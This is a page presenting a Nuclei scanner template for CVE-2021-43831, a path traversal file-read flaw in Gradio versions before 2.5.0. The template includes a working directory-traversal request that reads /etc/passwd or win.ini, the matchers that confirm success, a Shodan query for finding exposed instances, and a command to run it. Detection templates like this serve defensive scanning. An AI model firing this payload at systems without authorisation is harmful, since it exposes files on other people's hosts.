Gradio < 2.5.0 - Arbitrary File Read
ID: CVE-2021-43831
Severity: high
Author: isacaya
Tags: cve,cve2021,lfi,gradio
Description
Section titled “Description”Files on the host computer can be accessed from the Gradio interface
YAML Source
Section titled “YAML Source”id: CVE-2021-43831
info: name: Gradio < 2.5.0 - Arbitrary File Read author: isacaya severity: high description: | Files on the host computer can be accessed from the Gradio interface impact: | An attacker would be able to view the contents of a file on the computer. remediation: | Update to version 2.5.0. reference: - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2021-43831 cwe-id: CWE-22 epss-score: 0.00063 epss-percentile: 0.26511 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: vendor: gradio_project product: gradio framework: python shodan-query: title:"Gradio" tags: cve,cve2021,lfi,gradio
http: - method: GET path: - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
payloads: path: - /etc/passwd - /windows/win.ini
stop-at-first-match: true
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or
- type: status status: - 200# digest: 4a0a004730450221008fda60301d8db481121cd110d84acb6ce882255809aafaaad543088844b2d5d902202ee75a0612cfc50d048849c2ec76102127ad83fcdfa8f1f3b2f84812f9db3cd4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43831.yaml"